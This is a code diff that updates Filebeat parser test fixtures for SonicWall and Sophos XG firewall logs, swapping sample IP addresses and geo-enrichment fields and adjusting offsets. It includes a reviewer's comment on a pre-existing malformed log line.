 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -215,11 +201,11 @@
 "event.code": "98",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23421 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "event.original": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23421 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "fileset.name": "firewall",
 "input.type": "log",
- "log.offset": 1560,
- "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "log.offset": 1626,
+ "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -229,16 +215,9 @@
 "rsa.internal.event_desc": "Connection Opened",
 "rsa.internal.messageid": "98",
 "rsa.internal.msg": "Connection Opened",
- "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "rsa.time.event_time": "2007-01-03T16:48:10.000Z",
 "service.type": "sonicwall",
- "source.as.number": 3215,
- "source.as.organization.name": "Orange",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8582,
- "source.geo.location.lon": 2.3387,
 "source.ip": "2.2.2.2",
 "source.port": 36703,
 "tags": [
@@ -252,13 +231,13 @@
 "event.code": "30",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=8 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN",
+ "event.original": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=89.160.20.156 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=8 src=2.2.2.2:36703:WAN dst=89.160.20.156:50000:WAN",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 1763,
+ "log.offset": 1841,
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -278,11 +257,11 @@
 "event.code": "98",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:11\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23422 src=2.2.2.2:36704:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "event.original": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:11\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23422 src=2.2.2.2:36704:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "fileset.name": "firewall",
 "input.type": "log",
- "log.offset": 1974,
- "observer.ingress.interface.name": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "log.offset": 2064,
+ "observer.ingress.interface.name": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
 "observer.vendor": "Sonicwall",
@@ -292,16 +271,9 @@
 "rsa.internal.event_desc": "Connection Opened",
 "rsa.internal.messageid": "98",
 "rsa.internal.msg": "Connection Opened",
- "rsa.network.sinterface": "WAN dst=1.1.1.1:50000:WAN proto=tcp/50000",
+ "rsa.network.sinterface": "WAN dst=89.160.20.156:50000:WAN proto=tcp/50000",
 "rsa.time.event_time": "2007-01-03T16:48:11.000Z",
 "service.type": "sonicwall",
- "source.as.number": 3215,
- "source.as.organization.name": "Orange",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8582,
- "source.geo.location.lon": 2.3387,
 "source.ip": "2.2.2.2",
 "source.port": 36704,
 "tags": [
@@ -314,13 +286,13 @@
 "event.code": "38",
 "event.dataset": "sonicwall.firewall",
 "event.module": "sonicwall",
- "event.original": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=5 c=256 m=38 msg=\"ICMP packet dropped\" n=22070 src=219.89.19.223:1026:WAN dst=1.1.1.1:6822:WAN type=3 code=3",
+ "event.original": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=89.160.20.156 pri=5 c=256 m=38 msg=\"ICMP packet dropped\" n=22070 src=219.89.19.223:1026:WAN dst=89.160.20.156:6822:WAN type=3 code=3",
 "fileset.name": "firewall",
 "input.type": "log",
 "log.flags": [
 "dissect_parsing_error"
 ],
- "log.offset": 2177,
+ "log.offset": 2279,
 "observer.ingress.interface.name": "WAN",
 "observer.product": "Firewalls",
 "observer.type": "Firewall",
@@ -333,11 +305,6 @@
 "rsa.network.sinterface": "WAN",
 "rsa.time.event_time": "2007-01-03T16:48:14.000Z",
 "service.type": "sonicwall",
- "source.geo.continent_name": "Oceania",
- "source.geo.country_iso_code": "NZ",
- "source.geo.country_name": "New Zealand",
- "source.geo.location.lat": -41.0,
- "source.geo.location.lon": 174.0,
 "source.ip": "219.89.19.223",
 "source.port": 1026,
 "tags": [
@@ -351,13 +318,13 @@ "event.code": "537", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568000 src=219.89.19.223:1026:WAN dst=1.1.1.1:0:WAN proto=udp/0", + "event.original": "Jan 3 13:45:43 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:14\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568000 src=219.89.19.223:1026:WAN dst=89.160.20.156:0:WAN proto=udp/0", "fileset.name": "firewall", "input.type": "log", "log.flags": [ "dissect_parsing_error" ], - "log.offset": 2382, + "log.offset": 2496, "observer.product": "Firewalls", "observer.type": "Firewall", "observer.vendor": "Sonicwall", @@ -378,10 +345,10 @@ "event.code": "346", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=16 m=346 msg=\"IKE Initiator: Start Quick Mode (Phase 2).\" n=171872 src=2.2.2.2:500 dst=1.1.1.1:500", + "event.original": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=6 c=16 m=346 msg=\"IKE Initiator: Start Quick Mode (Phase 2).\" n=171872 src=2.2.2.2:500 dst=89.160.20.156:500", "fileset.name": "firewall", "input.type": "log", - "log.offset": 2582, + "log.offset": 2708, "observer.product": "Firewalls", "observer.type": "Firewall", "observer.vendor": "Sonicwall", 
@@ -399,16 +366,16 @@ "event.code": "98", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23423 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500", + "event.original": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23423 src=89.160.20.156:500:WAN dst=2.2.2.2:500:WAN proto=udp/500", "fileset.name": "firewall", "input.type": "log", - "log.offset": 2780, + "log.offset": 2918, "observer.ingress.interface.name": "WAN dst=2.2.2.2:500:WAN proto=udp/500", "observer.product": "Firewalls", "observer.type": "Firewall", "observer.vendor": "Sonicwall", "related.ip": [ - "1.1.1.1" + "89.160.20.156" ], "rsa.internal.event_desc": "Connection Opened", "rsa.internal.messageid": "98", @@ -416,14 +383,17 @@ "rsa.network.sinterface": "WAN dst=2.2.2.2:500:WAN proto=udp/500", "rsa.time.event_time": "2007-01-03T16:48:15.000Z", "service.type": "sonicwall", - "source.as.number": 13335, - "source.as.organization.name": "Cloudflare, Inc.", - "source.geo.continent_name": "Oceania", - "source.geo.country_iso_code": "AU", - "source.geo.country_name": "Australia", - "source.geo.location.lat": -33.494, - "source.geo.location.lon": 143.2104, - "source.ip": "1.1.1.1", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "source.port": 500, "tags": [ "forwarded", 
@@ -435,10 +405,10 @@ "event.code": "483", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=4 c=16 m=483 msg=\"Received notify: INVALID_ID_INFO\" n=171625 src=2.2.2.2:500 dst=1.1.1.1:500", + "event.original": "Jan 3 13:45:44 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=4 c=16 m=483 msg=\"Received notify: INVALID_ID_INFO\" n=171625 src=2.2.2.2:500 dst=89.160.20.156:500", "fileset.name": "firewall", "input.type": "log", - "log.offset": 2977, + "log.offset": 3127, "observer.product": "Firewalls", "observer.type": "Firewall", "observer.vendor": "Sonicwall", @@ -455,10 +425,10 @@ "event.code": "98", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", + "event.original": "Jan 3 13:45:45 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:15\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23424 src=192.168.115.10:11549:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "fileset.name": "firewall", "input.type": "log", - "log.offset": 3165, + "log.offset": 3327, "observer.ingress.interface.name": "WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "observer.product": "Firewalls", "observer.type": "Firewall", 
@@ -484,10 +454,10 @@ "event.code": "98", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:17\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445", + "event.original": "Jan 3 13:45:46 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:17\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23425 src=192.168.5.64:3182:LAN dst=192.168.1.100:445:WAN proto=tcp/445", "fileset.name": "firewall", "input.type": "log", - "log.offset": 3375, + "log.offset": 3543, "observer.ingress.interface.name": "LAN dst=192.168.1.100:445:WAN proto=tcp/445", "observer.product": "Firewalls", "observer.type": "Firewall", @@ -514,13 +484,13 @@ "event.code": "537", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:18\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568001 src=2.2.2.2:36699:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000 sent=1557 rcvd=957", + "event.original": "Jan 3 13:45:47 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:18\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568001 src=2.2.2.2:36699:WAN dst=89.160.20.156:50000:WAN proto=tcp/50000 sent=1557 rcvd=957", "fileset.name": "firewall", "input.type": "log", "log.flags": [ "dissect_parsing_error" ], - "log.offset": 3584, + "log.offset": 3758, "observer.product": "Firewalls", "observer.type": "Firewall", "observer.vendor": "Sonicwall", 
@@ -542,13 +512,13 @@ "event.code": "537", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy=\"name\"", + "event.original": "Jan 3 13:45:49 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=89.160.20.156 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=568002 src=192.168.5.10:3417:LAN dst=192.168.1.100:53:WAN proto=udp/dns sent=401 rcvd=254 vpnpolicy=\"name\"", "fileset.name": "firewall", "input.type": "log", "log.flags": [ "dissect_parsing_error" ], - "log.offset": 3806, + "log.offset": 3992, "observer.product": "Firewalls", "observer.type": "Firewall", "observer.vendor": "Sonicwall", @@ -569,10 +539,10 @@ "event.code": "98", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582", + "event.original": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:20\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23426 src=192.168.125.75:524:WAN dst=192.168.5.10:3582:LAN proto=udp/3582", "fileset.name": "firewall", "input.type": "log", - "log.offset": 4049, + "log.offset": 4241, "observer.ingress.interface.name": "WAN dst=192.168.5.10:3582:LAN proto=udp/3582", "observer.product": "Firewalls", "observer.type": "Firewall", 
@@ -598,10 +568,10 @@ "event.code": "98", "event.dataset": "sonicwall.firewall", "event.module": "sonicwall", - "event.original": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:21\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", + "event.original": "Jan 3 13:45:50 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:21\" fw=89.160.20.156 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23427 src=192.168.6.10:28503:WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "fileset.name": "firewall", "input.type": "log", - "log.offset": 4260, + "log.offset": 4458, "observer.ingress.interface.name": "WAN dst=192.168.5.10:53:LAN proto=tcp/dns", "observer.product": "Firewalls", "observer.type": "Firewall", diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log index 71fc60338005..5480251c5041 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log +++ b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log 
@@ -1,7 +1,7 @@ <30>device="SFW" date=2020-05-18 time=14:38:48 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041101618035 log_type="Anti-Spam" log_component="SMTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="firewall@firewallgate.com" to_email_address="Sysadmin@elasticuser.com" email_subject="*ALERT* Sophos XG Firewall" mailid="qkW2Y6-LxBk6U-vH-1590055245" mailsize=19728 spamaction="QUEUED" reason="Email has been accepted by Device and queued for scanning." src_domainname="elasticuser.com" dst_domainname="" src_ip="" src_country_code="" dst_ip="" dst_country_code="" protocol="TCP" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid 
- TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" +<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." 
src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=67.43.156.14 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" <30>device="SFW" date=2017-01-31 time=18:34:41 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041113413005 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="Gaurav123" from_email_address="gaurav1@iview.com" to_email_address=" gaurav2@iview.com" email_subject="RPD Spam Test: Spam" mailid="" mailsize=405 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=11:10:11 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041114413006 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Probable Spam" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="rule 8" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman.local" email_subject="RPD Spam test: Bulk" mailid="" mailsize=439 spamaction="Drop" reason="Mail detected as OUTBOUND PROBABLE SPAM." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=12:50:07 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041121613009 log_type="Anti-Spam" log_component="SMTP" log_subtype="DLP" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman. 
local" email_subject="Fwd: TESt" mailid="c0000002-1528269606" mailsize=5041 spamaction="DROP" reason="Email containing confidential data detected. Relevant Data Protection Policy applied." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="DLP" diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json index b8617119a8f8..04f1bad3aac6 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json @@ -65,19 +65,9 @@ { "@timestamp": "2020-05-18T14:38:49.000-02:00", "client.bytes": 0, - "client.ip": "92.38.133.63", + "client.ip": "89.160.20.156", "client.port": 52742, - "destination.as.number": 199567, - "destination.as.organization.name": "Fr. Sauter AG", "destination.bytes": 0, - "destination.geo.city_name": "Saint-Prex", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "CH", - "destination.geo.country_name": "Switzerland", - "destination.geo.location.lat": 46.4796, - "destination.geo.location.lon": 6.4599, - "destination.geo.region_iso_code": "CH-VD", - "destination.geo.region_name": "Vaud", "destination.ip": "185.8.209.194", "destination.port": 25, "destination.user.email": "info@pelasticuser.com", 
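Review bot: The rewritten second line of anti-spam.log still fuses three records into one, because its first `mailid="` is never closed and the text runs on through `mailid="device="SFW" date=2020-05-18 time=14:38:50 ...` and `... time=14:38:51 ...` until the third record's mailid finally closes the quote. The expected output in the next file section bears this out: the event keeps `@timestamp` 14:38:49 from the first record while `event.original`, `log_id` and the e-mail fields come from the third, so the `Clean` (log_id=041105613003) and `Spam` (log_id=041107413001) records never surface as events and that fixture coverage is silently lost. The commit repairs only the stray line break inside `email_subject`; terminating the first two `mailid` values (e.g. `mailid=""`, as the later records on this line already do) and regenerating the expected JSON would restore three separate events. The fused line is identical on the removed side, so this appears pre-existing rather than introduced here.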
@@ -89,7 +79,7 @@ "event.dataset": "sophos.xg", "event.kind": "event", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"<20200518070235.C1623996C64F9957@ELTOBGI.COM>\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=67.43.156.14 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", "event.outcome": "success", "event.severity": "4", "event.timezone": "-02:00", 
@@ -313,16 +279,15 @@ "sophos.xg.reason": "Sender IP address is blacklisted.", "sophos.xg.spamaction": "Prefix Subject", "sophos.xg.src_country_code": "GBR", - "source.as.number": 12488, - "source.as.organization.name": "Krystal Hosting Ltd", + "source.as.number": 35908, "source.bytes": 0, "source.domain": "ELTOBGI.COM", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "GB", - "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.4964, - "source.geo.location.lon": -0.1224, - "source.ip": "77.72.3.56", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.port": 55002, "source.user.email": "SHERIF.TOBGI@ELTOBGI.COM", "tags": [ @@ -361,7 +326,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 3123, + "log.offset": 3125, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "C44313350024-P29PUA", @@ -432,7 +397,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 3852, + "log.offset": 3854, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "S4000806149EE49", @@ -503,7 +468,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 4627, + "log.offset": 4629, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "S4000806149EE49", @@ -572,7 +537,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "informational", - "log.offset": 5389, + "log.offset": 5391, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "S4000806149EE49", 
@@ -642,7 +607,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 6143, + "log.offset": 6145, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "S4000806149EE49", @@ -709,7 +674,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 6740, + "log.offset": 6742, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "S4000806149EE49", @@ -779,7 +744,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 7445, + "log.offset": 7447, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "C44313350024-P29PUA", diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log index 9b6236d28c87..22ff5a6791f5 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log +++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log 
@@ -1,7 +1,7 @@ <30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 <30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" 